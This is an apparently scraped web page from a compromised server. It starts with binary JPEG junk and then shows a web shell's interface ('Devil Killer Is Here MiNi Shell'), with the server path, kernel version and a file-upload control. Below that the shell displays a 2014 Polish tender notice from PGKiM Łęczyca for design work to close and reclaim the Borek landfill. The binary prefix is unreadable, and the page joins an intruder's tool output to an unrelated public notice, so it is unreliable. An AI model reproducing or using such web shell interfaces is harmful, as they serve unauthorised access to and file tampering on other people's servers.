JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140529/181564-N-2014.html

<p class="kh_header"><b>Łęczyca: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ 
na zadanie pn: Zamknięcie i rekultywacja składowiska odpadów innych niż niebezpieczne i obojętne 
w Borku, gm. Łęczyca</b><br>
<b>Numer ogłoszenia: 181564 - 2014; data zamieszczenia: 29.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej w Łęczycy spółka  z o.o. , ul. Tumska 2, 99-100 Łęczyca, woj. łódzkie, tel. 024 7212285, faks 024 7213511.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkimleczyca.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: osoba prawna, o której mowa w art.3 ust.1 pkt.3 uPzp z dnia 29.01.2004r z późn. zm..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ 
na zadanie pn: Zamknięcie i rekultywacja składowiska odpadów innych niż niebezpieczne i obojętne 
w Borku, gm. Łęczyca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie nie podlega przepisom Ustawy z dnia 29 .01. 2004 roku - Prawo zamówień publicznych (Dz. U. z 2014 r.  poz. 423) wartość poniżej kwoty określonej na podstawie art. 4 ust.8 ustawy poniżej 30.000 EURO.
1. Przedmiot zamówienia 1.1 Przedmiotem zamówienia jest opracowanie dokumentacji projektowej, która zgodnie z art. 31 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2014 r. poz. 423 z późn. zm.) będzie służyła do opisu przedmiotu zamówienia na wykonanie technicznego sposobu zamknięcia i rekultywacji składowiska odpadów innych niż niebezpieczne i obojętne w Borku dla miasta Łęczycy,  wraz z uzyskaniem opracowań, operatów, uzgodnień i decyzji, w tym pozwolenia na budowę jeśli ustawy o tym stanowią. 1.2  Wykonawca powinien opisać przedmiot zamówienia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego, przenoszących te normy. W przypadku braku Polskich Norm przenoszących normy europejskie lub normy innych państw członkowskich EOG, należy uwzględnić normy zgodnie z art. 30 ustawy Prawo zamówień publicznych. Dopuszczając rozwiązania (równoważne) w opisywanym przedmiocie, wykonawca zobowiązany jest wskazać, które parametry techniczne, technologiczne i eksploatacyjne będą brane pod uwagę przy ocenie równoważności lub podać producentów urządzeń równoważnych.1.3  Dokumentacja powinna spełniać obowiązujące wymagania formalno - prawne, a w szczególności:wymogi ustawy Prawo budowlane z dnia 7 lipca 1994r. (tj. Dz. U z 2013 r. poz. 1409.) oraz związane z nią rozporządzenia;
wymogi ustawy Prawo ochrony środowiska z dnia 27 kwietnia 2001 r. (tj. Dz. U. z 2013r.  Poz. 1232 .),wymogi ustawy o odpadach z dnia 27.04.2001r.(tj. Dz. U. z 2010r. Nr 185 Poz. 1243),wymogi ustawy o ochronie gruntów rolnych i leśnych z dnia 03.02.1995r.(tj. Dz. U. z 2013r. Poz. 1205),wymogi Rozporządzenia Ministra Środowiska z dnia 24.03.2003 r. (Dz. U. 2003r. nr 61 poz. 549 z późn. zm.) w sprawie szczegółowych wymagań dotyczących lokalizacji, budowy, eksploatacji i zamknięcia, jakim powinny odpowiadać poszczególne typy składowisk odpadów,
wymogi Rozporządzenia Ministra Środowiska z dnia 09.12.2002 r. (Dz. U. 2002r. nr 220 poz. 1858 z późn. zm.) w sprawie zakresu, czasu, sposobu oraz warunków prowadzenia monitoringu składowisk odpadów,wymogi Rozporządzenia Ministra Środowiska z dnia 24.07.2006 r. (Dz. U. 2006r. nr 137 poz. 984 z późn. zm.) w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego,
wymogi Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462 z późn. zm.), wymogi Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (tekst jedn.: Dz. U. z 2013 poz. 1129),wymogi Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r.  Nr 130 poz. 1389);
1.4  Dokumentacja powinna opierać się na najnowszej wiedzy technicznej.

2. Zakres rzeczowy przedmiotu zamówienia obejmuje:
Opracowanie dokumentacji projektowej na zadanie pn: Zamknięcie i rekultywacja składowiska odpadów innych niż niebezpieczne i obojętne w Borku, gm. Łęczyca  obejmuje zaprojektowanie sposobu zamknięcia i rekultywacji kwater składowiska odpadów innych niż niebezpieczne i obojętne zlokalizowane w miejscowości Borek na działkach o nr ewid. 30.3, 30/4, 31/1 i 31/2 obręb Borek w gm. Łęczyca tj.
2.1   Opracowanie projektu budowlanego - szczegółowy zakres i forma projektu budowlanego powinny spełniać wymagania określone w ustawie Prawo budowlane (tj. Dz. U z 2013r. poz. 1409.), oraz w Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462 z późn. zm.).2.2    Opracowanie projektów wykonawczych - powinny obejmować swoim zakresem również harmonogram działań, ewentualną przebudowę urządzeń infrastruktury technicznej oraz konieczne prace rozbiórkowe. Projekty wykonawcze powinny uzupełniać i uszczegóławiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez wykonawcę i realizacji robót budowlanych i rozbiórkowych. Projekty wykonawcze powinny być sporządzone dla wszystkich urządzeń infrastruktury technicznej, które znajdują się w obszarze przedmiotowej inwestycji. Do projektów wykonawczych powinny być dołączone oświadczenia projektantów i oświadczenia sprawdzającego o sporządzeniu dokumentacji zgodnie z obecnie obowiązującymi przepisami oraz zasadami wiedzy technicznej. 2.3 Projekt wykonawczy rekultywacji składowiska odpadów innych niż niebezpieczne i obojętne w Borku i techniczny sposób jego zamknięcia winien być zgodny z Decyzją nr RŚVI.7241.2.5.2013.IW w sprawie zamknięcia składowiska odpadów wydaną przez Marszałka Województwa Łódzkiego z dnia 24 grudnia 2013r. - załącznik nr 7. 2.4 Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych  - powinno być wykonane zgodnie z 3 rozdziałem rozporządzenia w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego; powinno być wykonane dla danej dokumentacji i uwzględniać pełny zakres projektów wykonawczych, winny zawierać szczegółowe wymagania od wykonawcy robót w zakresie: materiałów, sprzętu, transportu zewnętrznego i technologicznego w ramach placu budowy, sposobu wykonania robót, kontroli jakości zrealizowanych robót, sposobu obmiaru robót do ich odbioru i rozliczenia, metod i zasad odbioru robót wykonanych itd. z uwzględnieniem kolejnych etapów rekultywacji. 2.5 Opracowanie przedmiarów robót - powinny być wykonane dla wszystkich branż i wszystkich robót objętych dokumentacją. Przedmiar powinien zawierać wszystkie szczegółowe obmiary i wyliczenia, a także powinien być powiązany ze specyfikacją techniczną wykonania i odbioru robót budowlanych poprzez podanie dla każdej pozycji przedmiaru numeru specyfikacji. 2.6 Opracowanie kosztorysów inwestorskich, z uwzględnieniem kolejnych etapów zadania - wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389).2.7 Wykonanie map do celów projektowych. 2.8 Przygotowanie wniosku i uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji (jeżeli jest wymagana). 2.9 Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia - zgodnie z Rozporządzeniem Ministra Infrastruktury  z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U. z 2003 r. nr 120, poz. 1126 z późn. zm). 2.10 Wykonanie inwentaryzacji, badań, pomiarów i oceny technicznej istniejących obiektów, w zakresie potrzebnym do wykonania projektów budowlanych i projektów wykonawczych. 2.11 Sporządzenie kompletnego wniosku i uzyskanie w imieniu i na rzecz Zamawiającego - pozwolenia na budowę -jeśli ustawy o tym stanowią. 2.12 Uzgodnienie z Zamawiającym i zatwierdzenie przez niego przyjętych przez wykonawcę rozwiązań technicznych. 2.13  Wykonawca uzyska wszelkie wymagane, zgodnie z polskim prawem, warunki techniczne, uzgodnienia, opinie i decyzje administracyjne niezbędne do opracowania dokumentacji. 2.14 Zamawiający zobowiązuje Wykonawcę prac projektowych do bieżącej informacji o stanie zaawansowania prac i dokonywania z Zamawiającym protokolarnych uzgodnień w zakresie projektowanych rozwiązań technologicznych i materiałowych - spotkania w siedzibie Zamawiającego. 2.15  Wykonawca w trakcie prac projektowych jest zobowiązany informować Zamawiającego o stopniu zaawansowania prac. Dokumentacja budowlana wymaga uzgodnienia z inwestorem we wszystkich fazach projektowania. 2.16  Wykonawca udzieli gwarancji na wykonane prace projektowe na okres trzech lat od dnia protokolarnego odbioru dokumentacji oraz rękojmi za wady fizyczne i prawne dokumentacji, która zakończy się wraz z okresem rękojmi na roboty budowlane i rozbiórkowe wykonane na jej podstawie. 2.17  Wykonawca realizuje zamówienie na podstawie pełnomocnictwa do działania w imieniu i na rzecz Zamawiającego - w celu związanym z niniejszym zamówieniem, w tym wystąpienie o wszelkie wymagane prawem decyzje, uzgodnienia, opinie i pozwolenia, niezbędne do opracowania dokumentacji projektowej. 2.18  Złożony przez Wykonawcę projekt (zakres i forma) musi spełniać wszelkie formalne i faktyczne wymagania niezbędne do uzyskania zezwolenia na realizację inwestycji, ogłoszenia postępowania przetargowego zamówienia, a następnie do rozpoczęcia robót budowlanych i rozbiórkowych. 2.19 Dokumentacja powinna być zaopatrzona w wykaz opracowań oraz pisemne oświadczenie, że wykonana jest zgodnie z umową, obowiązującymi przepisami, normami i wytycznymi, że została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć i może być skierowana do realizacji. Wykaz opracowań oraz pisemne oświadczenie, o którym mowa wyżej stanowią integralną część przedmiotu zamówienia. 2.20  Zamawiający wymaga, aby Wykonawca w dokumentacji projektowej oraz w specyfikacjach technicznych wykonania i odbioru robót określił właściwości urządzeń i materiałów za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane (bez podania znaków towarowych, patentów lub pochodzenia) w sposób zgodny z przepisami ustawy Prawo zamówień publicznych oraz ustawy o zwalczaniu nieuczciwej konkurencji (tj. Dz.U. z 2003 r. Nr 153, poz.1503 z pźn. zm.). Powyższy wymóg uzasadniony jest tym, że stwarzanie sytuacji powodującej bezpośrednio lub pośrednio narzucenie Wykonawcom robót przez podmioty trzecie konieczności dokonania zakupu u danego przedsiębiorcy poprzez podawanie w dokumentacji technicznej znaków towarowych, patentów lub pochodzenia urządzeń lub materiałów stanowi tzw. (czyn nieuczciwej konkurencji) w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji. 2.21  Zamawiający wymaga, aby Wykonawca przed sporządzeniem oferty dokonał oględzin terenu i obiektów przeznaczonych dla inwestycji, a także zdobył na swoją odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy i wykonania zamówienia. Koszt dokonania oględzin terenu ponosi Wykonawca. 2.22  Dokumentacja projektowa winna obejmować następujący zakres prac 

	I. Opis stanu istniejącego:
Składowisko wyposażone jest w następujące obiekty budowlane , urządzenia, instalacje i sprzęt:
1.Kwatery składowania nr I i nr II
Podstawowe parametry kwater składowania:
Kwatera nr I - wypełniona i zamknięta, o pow. 6 400m2, poj. 38 000m3 (21 100 Mg),
Kwatera nr II - wypełniona w 95%, o pow. 17 000m2, poj. 117 000m3 (ok. 43 900Mg).
Uszczelnienie kwater
Na wyprofilowane dno wyrobiska po piaskach i żwirach nawieziono warstwą ca 30cm gruntu stabilizowanego (piasek z cementem), na którym rozścielono warstwę 10 cm piasku. Na warstwie piasku położono folię izolacyjną grubości 2 mm, łączoną na zakład. Folią uszczelniono też stabilizowane skarpy wyrobiska. Na dnie niecki na folii ułożono warstwę piasku grubości do 10cm i ułożono  rurociągi drenażu nadfoliowego.  Do zabezpieczenia folii użyto płyt spilśnionych miękkich o grubości 15mm. Całość przykryto warstwą ochronną piasków o grubości 30cm ponad            rurociągami. Łączna grubość warstwy piaszczystej to ca 50 cm.  Skarpy zabezpieczono płytami chodnikowymi.  Nachylenie skarp kwater ca 1: 2. Kwatery ogroblowane wałami ziemnymi wysokości ca 1,0 m o szerokości korony                2,3 - 3,0 m.
2. Teren składowania wyposażony jest w:
 - Instalacje odbioru odcieków:
a) drenaż nadfoliowy z rur ceramicznych Dn 15cm ułożonych  ze spadkiem ca 3% z odpływem w kierunku zachodnim,
b) rurociąg Dn 200 i Dn 250 z rur kamionkowych ze studniami rewizyjnymi z kręgów betonowych Dn 1000 i 1200 odprowadzający odcieki w kierunku południowym do zbiornika odcieków, zbiornik odcieków z kręgów betonowych Dn 1500 o poj. 8,5 m3, będący jednocześnie pompownią z pompą włączaną automatycznie,
c) żelbetowy zbiornik bezodpływowy o poj. 30 m3. Odcieki ze zbiornika  wywożone do oczyszczalni ścieków w Łęczycy,
- Drenaż opaskowy wód opadowych wykonany z rur kamionkowych Dn 30cm. Studnie rewizyjne z kręgów betonowych  Dn 1200  z włazami żeliwnymi i osadnikami. Wody gruntowe i deszczowe odprowadzane do rowu                  melioracyjnego R-37, z którego przez system rowów odprowadzane do rzeki Zian. 
- Budynki administracyjno-socjalne z pomieszczeniem wagowego i pomieszczeniami socjalnymi. Budynek socjalny wyposażony w instalację wod-kan. Woda z własnej studni głębinowej znajdującej się na terenie składowiska ( stanowi piezometr P-4) i bezodpływowy zbiornik ścieków.
- Wiata na surowce wtórne.
- Magazyny: środków dezynfekcyjnych, paliw i smarów.
- Droga dojazdowa.
- Brodzik dezynfekcyjny.
- Wydzielone miejsce mycia pojazdów.
- Waga samochodowa, najazdowa, 50t.
Kwatery składowiska wyposażono w system ujmowania gazu składowiskowego: 
kwatera nr 1 -3 studnie odgazowania, nr 2 - 12 studni odgazowania.
Studnie odgazowania biernego, zakończone w części nadziemnej kominkami odprowadzającymi biogaz do atmosfery.
Teren składowiska jest ogrodzony siatką z bramą wjazdową oraz z bramą awaryjną.
Otoczony naturalnym pasem zieleni, uzupełnionym dodatkowymi nasadzeniami. Po prawej stronie bramy wjazdowej wydzielono w ogrodzeniu teren z pojemnikami do zbierania odpadów dowożonych indywidualnie.

II. Harmonogram działań związanych z technicznym sposobem zamknięcia i rekultywacji składowiska

1)Roboty przygotowawcze - geodezyjne.
2)Uporządkowanie terenu wokół kwatery nr II.
3)Końcowe formowanie bryły kwatery nr II.
4)Sprawdzenie sprawności działania kolektora odcieków i drenażu opaskowego.
5)Przebudowa systemu odgazowania wraz z zamontowaniem pochodni do spalania biogazu..
6)Zabezpieczenie piezometrów kręgami betonowymi.
7)Rozbiórki ogrodzenia i nawierzchni dróg wewnętrznych.
8)Wykonanie ogrodzenia w nowej lokalizacji.
9)Demontaż wagi i brodzika dezynfekcyjnego.
10)Uporządkowanie terenu po wykonaniu prac rekultywacyjnych..
11 Roboty agrotechniczne z obsiewem powierzchni po rozbiórkach dróg wewnętrznych.
12)Formowanie warstwy okrywowej- warstwa drenażowa z doszczelnieniem folią terenów wokół studni odgazowania.
13)Uzupełnienie warstwy glebowej o 0,5 m na kwaterze nr I.
14)Formowanie warstwy okrywowej- warstwa glebowa.
15)Roboty agrotechniczne z obsiewem powierzchni skarp i wierzchowiny (sukcesywne).
16)Koszenie pielęgnacyjne i obsiewy uzupełniające.
17)Inne prace przewidziane w Decyzji w sprawie zamknięcia składowiska odpadów nr RŚVI.7241.2.5.2013.IW.

Opracowano Ekspertyzę dotyczącą zamknięcia składowiska odpadów w m. Borek, gm. Łęczyca, pow. łęczycki, która jest do wglądu i wykorzystania w czasie projektowania.

3. Przekazanie dokumentacji projektowej
1)Wykonawca przekaże Zamawiającemu przedmiot umowy, a Zamawiający po zapoznaniu się, dokona w ciągu  20 dni protokolarnego jego odbioru - załącznik nr 6 do SIWZ.
2) Odbiór opracowanego projektu budowlanego, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiarów robót i kosztorysów inwestorskich odbędzie się w siedzibie Zamawiającego. Dokumentacja zostanie przekazana wraz z oświadczeniem, że wykonana została zgodnie z umową, obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi oraz, że została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć. Oświadczenie to powinno zawierać wykaz całej opracowanej dokumentacji.
3) Dokumentację należy przekazać protokolarnie Zamawiającemu w następujących ilościach:
 
 a) Projekt budowlany, projekty wykonawcze, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych - w 5 egz. (2 projekty budowlane opieczętowane przez Starostwo Powiatowe po uzyskaniu Pozwolenia      na budowę, jeśli są wymogi ustawowe),
 b) Kosztorysy inwestorskie - w 2 egz.
 c) Inwentaryzacje, badania i ekspertyzy - w 2 egz.
 d) Całość dokumentacji również w formie elektronicznej na nośniku elektronicznym - w 1 egz.: - opis techniczny należy dostarczyć w formie tekstowej zgodnie z MS Word (pdf lub doc.), -  kosztorysy dostarczyć w formacie programu, w jakim są tworzone oraz w formacie ATH, PDF, -  mapy, rysunki techniczne, przekroje, rozwiązania szczegółowe należy dostarczyć w wersji elektronicznej        w oryginalnym formacie oraz wyeksportowane do formatu rastrowego  (JPEG) lub PDF. Stopień kompresji nie może powodować zamazywania szczegółowego obrazu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 1 000,00 PLN, słownie: jeden tysiąc złotych.  3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)w pieniądzu, przelewem na rachunek bankowy:Bank PEKAO SA nr konta 60 1240 3190 1111 0000 2983 7856  - z adnotacją -wadium - OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ na zadanie pn: Zamknięcie i rekultywacja składowiska odpadów innych niż niebezpieczne i obojętne w Borku, gm. Łęczyca,    2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 3) w gwarancjach bankowych, 4) w gwarancjach ubezpieczeniowych, 5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).                                      
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.
5. Wadium wnoszone w innej formie niż pieniądzu należy oryginał załączyć do oferty.
6. W przypadku niezabezpieczenia oferty wadium jedną z określonych w niniejszej specyfikacji form wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć:
stosowne oświadczenie o posiadaniu uprawnień do prowadzenia określonej działalności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć :
1) Wykaz prac projektowych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że prace zostały wykonane zgodnie z zasadami sztuki projektowej i prawidłowo ukończone. 
Wykonawca potwierdzi spełnianie warunków udziału w postępowaniu, jeżeli wykaże, że wykonał  co najmniej 1  dokumentację projektową na rekultywację składowiska odpadów, z oświadczeniem, że prace zostały wykonane zgodnie z zasadami sztuki projektowej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć :
        1) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia.  
Potwierdzeniem spełniania warunku będzie przedstawienie zespołu projektantów posiadających uprawnienia w branżach konstrukcyjno- budowlanej, drogowej, elektrycznej oraz instalacyjnej w zakresie sieci  wodociągowej, kanalizacyjnej i gazowej, posiadającym wymagane prawem uprawnienia projektowe, 
Uprawnienia zgodne przepisami ustawy Prawo Budowlane (tj. Dz. U. z 2013r.  poz. 1409 z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r. Nr 83, poz. 578 z późn. zm.) lub innymi równoważnymi uprawnieniami umożliwiającymi wykonanie tych samych czynności do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej samej specjalności.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw.</p>
